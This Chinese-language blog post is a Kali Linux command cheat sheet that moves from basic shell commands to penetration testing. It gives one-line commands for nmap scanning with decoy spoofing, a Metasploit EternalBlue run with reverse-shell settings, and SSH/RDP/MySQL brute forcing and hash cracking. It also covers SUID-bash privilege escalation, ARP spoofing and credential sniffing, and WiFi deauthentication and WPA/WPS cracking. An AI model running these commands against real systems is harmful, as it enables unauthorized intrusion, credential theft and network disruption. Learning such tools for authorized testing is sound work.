Kali Linux入门手册 | 添柴不加火

目录

一、基础系统/目录操作

  1. ls --- 列出当前目录文件/文件夹
  2. ls -l --- 详细列出文件属性(权限、大小、修改时间)
  3. ls -a --- 显示隐藏文件(包含...
  4. ls -la --- 详细显示所有文件(含隐藏)
  5. cd / --- 切换到根目录
  6. cd .. --- 切换到上一级目录
  7. cd ~cd --- 切换到当前用户主目录
  8. cd - --- 切换到上一次操作的目录
  9. pwd --- 查看当前所在绝对路径
  10. mkdir test --- 创建名为test的文件夹
  11. mkdir -p /a/b/c --- 递归创建多级目录
  12. rm file --- 删除单个文件
  13. rm -f file --- 强制删除文件(不提示)
  14. rm -r dir --- 递归删除文件夹及内部内容 危险命令rm -rf /rm -rf /* 会瞬间清空整个系统。永远先用 ls 确认路径,再执行带 -r-rf 的删除。
  15. rm -rf dir --- 强制递归删除(高危,谨慎使用)
  16. cp file /tmp/ --- 复制文件到指定目录
  17. cp -r dir /tmp/ --- 递归复制文件夹
  18. mv file /tmp/ --- 移动文件到指定目录(也可用于重命名)
  19. mv oldname newname --- 给文件/文件夹重命名
  20. touch newfile --- 创建空文件
  21. chmod 777 file --- 赋予所有用户读写执行权限 极度危险 ,生产环境几乎从不使用777。常见安全组合:文件 chmod 644,目录/可执行脚本 chmod 755
  22. chmod 755 file --- 所有者读写执行,其他用户读执行
  23. chown root:root file --- 修改文件所属用户和组为root
  24. df -h --- 查看磁盘空间(人性化显示)
  25. free -h --- 查看内存/交换分区使用情况

二、文件编辑/查看操作

  1. cat file --- 正序查看文件全部内容
  2. tac file --- 倒序查看文件全部内容
  3. head file --- 查看前10行
  4. head -n 20 file --- 查看前20行
  5. tail file --- 查看后10行
  6. tail -n 20 file --- 查看后20行
  7. tail -f file --- 实时监控文件变化(日志分析最常用)
  8. more file --- 分页查看(空格/回车翻页)
  9. less file --- 高级分页查看(支持上下翻页、/搜索)
  10. nano file --- 简易文本编辑器
  11. vim file --- 高级编辑器(按 i 编辑,Esc 退出编辑,:wq 保存退出,:q! 强制退出)
  12. grep "keyword" file --- 在文件中搜索关键词
  13. grep -i "keyword" file --- 忽略大小写搜索
  14. grep -r "keyword" dir --- 递归搜索整个目录
  15. wc -l file --- 统计文件行数

三、网络基础操作

  1. ifconfig --- 查看/配置网络接口(旧命令)
  2. ip aip addr --- 现代推荐命令,查看网络接口详情
  3. ip addr add 192.168.1.100/24 dev eth0 --- 临时添加IP(重启丢失) 网卡名说明:eth0 仅为示例,现代系统常见 ens33/enp03/wlan0 等,用 ip link 查看真实名称。很多工具支持 -i any(所有接口)。永久配置建议用 nmcli 或 Netplan。
  4. route -n --- 查看路由表
  5. ip route --- 现代路由查看/配置命令
  6. ping ip --- 测试连通性(默认无限发送,按 Ctrl+C 停止)
  7. ping -c 4 ip --- 发送4个包后停止
  8. ping -i 0.5 ip --- 每0.5秒发一个包(快速探测)
  9. netstat -tulnp --- 查看监听端口及进程(过时,推荐 ss
  10. netstat -an --- 查看所有连接(过时)
  11. ss -tulnp --- 现代首选,快速查看监听端口 口诀 :新系统一律用 ss
  12. arp -a --- 查看ARP缓存表
  13. arp -s ip mac --- 静态绑定IP和MAC
  14. hostname --- 查看主机名
  15. hostname newname --- 临时修改主机名
  16. curl url --- 访问URL并显示内容
  17. wget url --- 下载文件到当前目录
  18. wget -O newname url --- 下载并自定义文件名
  19. curl ifconfig.me --- 查看本机公网IP(备选:curl icanhazip.comcurl ip.sb
  20. telnet ip port --- 测试指定端口是否开放

四、信息收集命令

  1. uname -a --- 查看内核版本、系统架构、主机名等
  2. cat /etc/issue --- 查看系统发行版简要信息
  3. cat /etc/os-release --- 详细查看系统版本信息(推荐)
  4. whoami --- 查看当前登录用户名
  5. who --- 查看当前所有登录系统的用户
  6. w --- 查看当前登录用户及正在执行的操作
  7. last --- 查看系统登录历史记录
  8. ps -ef --- 查看所有运行的进程(详细信息)
  9. ps aux --- 以BSD格式查看所有进程
  10. top --- 实时监控系统进程(资源占用、PID等,按 q 退出)
  11. pstree --- 以树形结构查看进程关系
  12. netstat -antp --- 查看所有TCP连接及对应进程(过时,建议用 ss
  13. find / -name "*.sh" --- 从根目录搜索所有.sh后缀的文件 提示:从根目录搜索很慢,建议指定路径如 find /home -name ...
  14. find / -perm -4000 -type f 2>/dev/null --- 搜索SUID权限文件(常用于提权线索)
  15. arp-scan -larp-scan --localnet --- 扫描局域网存活主机(Kali常用)
  16. fping -g 192.168.1.0/24 --- 快速扫描C段存活主机
  17. cat /etc/passwd --- 查看系统所有用户信息
  18. cat /etc/group --- 查看系统所有用户组信息
  19. cat /var/log/auth.log --- 查看系统认证日志(登录、sudo操作等)
  20. lsof -i:80 --- 查看占用80端口的进程

五、端口/网段扫描命令

  1. nmap ip --- 默认扫描目标(1000个常用端口)
  2. nmap -sn 192.168.1.0/24 --- 仅扫描网段存活主机(无端口扫描)
  3. nmap -p 80 ip --- 仅扫描80端口
  4. nmap -p 1-65535 ip --- 扫描所有端口
  5. nmap -p 80,443,22 ip --- 扫描指定多个端口
  6. nmap -sT ip --- TCP全连接扫描(易被检测)
  7. nmap -sS ip --- TCP SYN半开放扫描(隐蔽,默认推荐) 区别:-sS 只发SYN,不完成握手,不易被记录;-sT 完整握手,像正常访问。
  8. nmap -sU ip --- UDP端口扫描
  9. nmap -sV ip --- 扫描端口并探测服务版本信息
  10. nmap -O ip --- 探测目标操作系统类型(大写O)
  11. nmap -A ip --- 全面扫描(存活+端口+版本+OS+脚本)
  12. nmap -T4 ip --- 提高扫描速度(-T0 最慢,-T5 最快)
  13. nmap -oN result.txt ip --- 保存为普通文本
  14. nmap -oX result.xml ip --- 保存为XML格式
  15. nmap --script=vuln ip --- 加载漏洞脚本探测已知漏洞 2026年提示:nmap脚本引擎更新频繁,vuln脚本false positive较多,建议结合-sV使用。
  16. nmap --script=brute ip --- 加载暴力破解脚本(弱口令尝试)
  17. nmap -Pn ip --- 跳过主机存活检测,直接扫描端口(目标禁ping时必加)
  18. nmap -D RND:10 ip --- 使用随机10个假IP欺骗源地址(隐藏真实IP)
  19. masscan 192.168.1.0/24 -p 80,443 --- 超高速端口扫描(比nmap快得多)
  20. zenmap --- 打开Nmap图形化界面(适合新手)

六、漏洞探测/利用基础(Metasploit示例)

  1. msfconsolemsfconsole -q --- 打开Metasploit控制台(-q 安静模式推荐)
  2. search ms17-010 --- 搜索指定漏洞模块
  3. use exploit/windows/smb/ms17_010_eternalblue --- 加载漏洞利用模块
  4. show options --- 查看模块所需参数
  5. set RHOSTS ip --- 设置目标IP
  6. set LHOST ip --- 设置本机攻击IP(反弹shell用)
  7. set LPORT 4444 --- 设置监听端口
  8. exploitrun --- 执行漏洞利用
  9. back --- 退出当前模块
  10. sessions -l --- 查看所有反弹shell会话
  11. sessions -i 1 --- 进入编号1的shell会话
  12. sessions -k 1 --- 关闭编号1的会话
  13. nessusd start --- 启动Nessus服务(旧写法)
  14. nessuscli scan --launch 123 --- 启动指定Nessus扫描任务 注意:Nessus新版本多用systemctl管理或web界面操作。

七、密码破解命令

  1. hydra -l root -P pass.txt ssh://ip --- 破解SSH(用户名+密码字典) 提示:在线暴力易被封IP,可加 -t 4 限制线程。
  2. hydra -L user.txt -P pass.txt rdp://ip --- 破解RDP
  3. hydra -l admin -P pass.txt http-get://ip --- 破解HTTP GET登录
  4. hydra -l admin -P pass.txt mysql://ip --- 破解MySQL
  5. john --wordlist=pass.txt passwd --- John the Ripper 破解系统密码文件
  6. john --show passwd --- 查看已破解密码
  7. hashcat -m 0 hash.txt pass.txt --- Hashcat破解MD5
  8. hashcat -m 1000 hash.txt pass.txt --- 破解NTLM
  9. crunch 6 8 0123456789 -o 6-8num.txt --- 生成6-8位纯数字字典
  10. crunch 8 8 abc123 -o 8char.txt --- 生成8位字母+数字字典
  11. cewl url -w webpass.txt --- 从网站爬取内容生成专属字典
  12. medusa -u root -P pass.txt -h ip -M ssh --- 美杜莎破解SSH(速度快)
  13. sqlmap -u url --forms --- 检测SQL注入并尝试破解数据库
  14. fcrackzip -D -p pass.txt test.zip --- 破解ZIP压缩包
  15. 7z x test.zip -p123456 --- 用已知密码解压加密ZIP

八、提权/本地渗透命令

  1. sudo -l --- 查看当前用户可用的sudo命令(提权核心)
  2. sudo su --- 以root权限切换用户
  3. su root --- 切换到root(需root密码)
  4. id --- 查看当前用户UID、GID、组信息
  5. find / -type f -perm -4000 2>/dev/null --- 搜索SUID文件 常见可利用:findvimnanolessmorecp 等(视系统版本而定)
  6. find / -type f -perm -2000 2>/dev/null --- 搜索SGID文件
  7. chkrootkit --- 检测rootkit后门
  8. unshare -rm /bin/bash --- 利用内核漏洞临时提权(老漏洞,成功率低)
  9. cp /bin/bash /tmp/bash; chmod 4755 /tmp/bash --- 制作SUID bash
  10. ./tmp/bash -p --- 执行SUID bash提权 现代防护:很多系统有no-new-privs等机制,成功率大幅下降,仅学习参考。
  11. ps aux | grep root --- 查看root进程(寻找提权突破口)
  12. cat /proc/cmdline --- 查看启动参数(找提权线索)
  13. lsmod --- 查看加载的内核模块
  14. exploit-db --- 打开Exploit-DB漏洞库(Kali内置)

九、嗅探抓包/流量分析

  1. tcpdump -i any --- 在所有接口抓包(推荐any而非eth0)
  2. tcpdump -i any -w cap.pcap --- 抓包保存为pcap文件
  3. tcpdump -i any port 80 --- 仅抓80端口流量
  4. wireshark --- 打开图形化抓包工具
  5. tshark -i any --- Wireshark命令行版
  6. arpspoof -i any -t 192.168.1.100 192.168.1.1 --- ARP欺骗 2026年推荐:bettercap(功能更全,支持HTTPS/DNS等中间人攻击)
  7. driftnet -i any --- 嗅探局域网图片流量
  8. urlsnarf -i any --- 嗅探URL访问记录
  9. dsniff -i any --- 综合嗅探(捕获FTP/HTTP/SMB凭证)
  10. ngrep -d any "password" --- 过滤包含关键词的网络流

十、无线渗透命令

  1. airmon-ng start wlan0 --- 开启监听模式(网卡变为wlan0mon
  2. airmon-ng stop wlan0mon --- 关闭监听模式
  3. airodump-ng wlan0mon --- 扫描周围WiFi
  4. airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w wifi wlan0mon --- 定向抓包
  5. aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX wlan0mon --- 无限deauth断网攻击
  6. aircrack-ng -w pass.txt wifi-01.cap --- 字典破解WPA/WPA2
  7. reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vW --- 破解WPS
  8. wash -i wlan0mon --- 扫描开启WPS的设备
  9. kismet --- 无线流量嗅探/扫描(图形化)
  10. bully -i wlan0mon -b XX:XX:XX:XX:XX:XX --- WPS破解(成功率较高) 提示:运行前常需 airmon-ng check kill 杀干扰进程

如果未安装kali,可以参考作者另一篇文章:https://www.cnblogs.com/xize766/articles/19548059/vm-kali-install
温馨提示:本文仅供学习参考,任何违法行为均与作者无关。